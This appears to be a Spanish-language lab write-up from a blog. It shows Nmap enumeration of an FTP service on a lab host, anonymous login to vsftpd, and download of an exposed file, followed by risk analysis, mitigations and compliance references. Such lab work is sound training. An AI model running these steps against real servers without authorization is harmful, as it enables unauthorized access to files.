1
Laboratorio: Infiltración Estratégica en Infraestructura FTP
Laboratorio: Infiltración Estratégica en Infraestructura FTP

Infiltración Estratégica en Infraestructura FTP

1. Detección del Servicio FTP

Se detectó un servicio FTP en el puerto 21 del host objetivo mediante un escaneo con Nmap:

nmap -p 21 192.168.7.11

Explicación: Se especifica el puerto 21, comúnmente utilizado por FTP, para validar su disponibilidad.

Nmap puerto 21 FTP

2. Enumeración del Servicio y Validación de Acceso Anónimo

Se realizó una enumeración avanzada del servicio FTP para identificar su versión, configuración y posibles exposiciones de seguridad.

nmap -p 21 -sCTV 192.168.7.11

Explicación:

  • -p 21 → Analiza específicamente el puerto 21
  • -sC → Ejecuta scripts NSE por defecto para enumeración básica
  • -sV → Detecta la versión del servicio expuesto
  • -T → Ajusta la temporización del escaneo

Resultado exitoso con:

  • Servicio: vsftpd 3.0.3
  • Acceso: Anonymous FTP login allowed (FTP code 230)
  • Archivo expuesto: clave.txt
Enumeración FTP con acceso anónimo

3. Acceso al Servicio FTP

Se accedió al servicio FTP utilizando autenticación anónima:

ftp 192.168.7.11

Durante la autenticación se utilizó el usuario anonymous, logrando acceso exitoso al servidor.

Name (192.168.7.11:kali): anonymous
Password:
230 Login successful.
Acceso FTP anónimo exitoso

4. Enumeración y Descarga del Archivo Expuesto

Una vez dentro del servidor FTP, se listaron los archivos disponibles y se descargó el archivo identificado durante la enumeración previa:

ls
get clave.txt
bye

Resultado: El archivo clave.txt fue descargado exitosamente al sistema atacante.

Esto confirma que cualquier usuario sin credenciales válidas puede conectarse, listar contenido y extraer archivos desde el servicio expuesto.

Descarga de archivo clave.txt desde FTP

5. Análisis del Riesgo

La presencia de acceso FTP anónimo expone el sistema a accesos no autorizados. Un atacante podría:

  • Acceder a archivos confidenciales
  • Extraer información sensible sin autenticación
  • Realizar reconocimiento interno del sistema
  • Utilizar el servicio como punto inicial de intrusión

6. Recomendaciones de Mitigación

  • Deshabilitar el acceso anónimo en el servicio FTP
  • Eliminar archivos sensibles expuestos en directorios públicos
  • Restringir el acceso FTP por rangos de IP autorizados
  • Migrar a protocolos seguros como SFTP o FTPS
  • Aplicar políticas de monitoreo y auditoría sobre accesos y transferencias

⚠️ Incumplimiento con Estándares y Marcos

La habilitación de acceso anónimo y la exposición de archivos sensibles violan múltiples estándares de ciberseguridad:

  • PCI DSS: Requisitos 2, 7 y 10 sobre configuración segura, control de acceso y monitoreo
  • ISO/IEC 27001: Controles A.9 (Control de Acceso) y A.12 (Seguridad Operacional)
  • NIST SP 800-53: AC-3 (Access Enforcement), AC-6 (Least Privilege), CM-7 (Least Functionality)
  • OWASP Top 10: Security Misconfiguration

Estas fallas podrían comprometer información sensible y facilitar accesos persistentes o reconocimiento ofensivo por parte de un atacante externo.

Leave a Reply

Your email address will not be published. Required fields are marked *

PHP Code Snippets Powered By : XYZScripts.com